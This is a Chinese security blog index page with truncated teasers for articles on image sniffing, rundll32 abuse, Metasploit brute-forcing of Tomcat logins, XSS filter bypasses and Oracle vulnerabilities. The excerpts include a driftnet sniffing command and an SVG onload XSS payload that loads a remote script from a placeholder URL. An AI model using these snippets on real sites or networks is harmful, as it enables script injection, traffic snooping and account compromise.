图片嗅探这是一个很好玩的功能工具:driftnet过程:driftnet -i at0然后程序会打开一个小窗口显示所有传输的图片:单击图片保存到/当然可以开启 Adjun...
网络安全
网络安全
网络安全
怎样组织有效模拟演习的红蓝对抗
扮演攻击者的角色可让安全团队的防御更加牢固。从圈定正确的人选到衡量模拟与现实事件的差异,以下指南助力安全基础设施模拟演习。军方搞,政府问责办公室搞,国家安全局也搞。演习的概念甚至渗透到了企业领域:模拟...
网络安全
关于利用rundll32执行程序的分析
0x00 前言最近看到了一篇有趣的文章《Abusing Exported Functions and Exposed DCOM Interfaces for Pass-Thru Command Exe...
Metasploit爆破Tomcat弱口令
Metasploit爆破Tomcat弱口令 实验步骤: 1) 利用枚举的方法破解Tomca...
网络安全
OSCP经验分享
一、OSCP简介安全技术类的证书有很多,像是CEH, Security+, CISSP等等。除了众多侧重于笔试的安全认证,OSCP(Offensive Security Certified Profe...
网络安全
Hidden属性的input标签中XSS的触发方法
今天看到一个XSS漏洞,插入点在一个有hidden 属性的input 标签,大致情况如下:<input type="hidden" n...
xss构造
<svg/onload=s=createElement('script');body.appendChild(s);s.src='url';> ...
XSS 绕过过滤器大全
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet http://zhyuxuan.blog.51cto.com/220966...
Bypass xss过滤的测试方法
0x00 背景本文来自于《Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters》其中的bypass xss...
漏洞分享
Oracle数据库漏洞分析:CVE-2012-1675和CVE-2012-3137
摘要 一般性的数据库漏洞,都是在成功连接或登录数据库后实现入侵;本文介绍两个在2012年暴露的Oracle漏洞,通过这两种漏洞的结合,可以在不掌握用户名/密码的情况下入侵Orac...
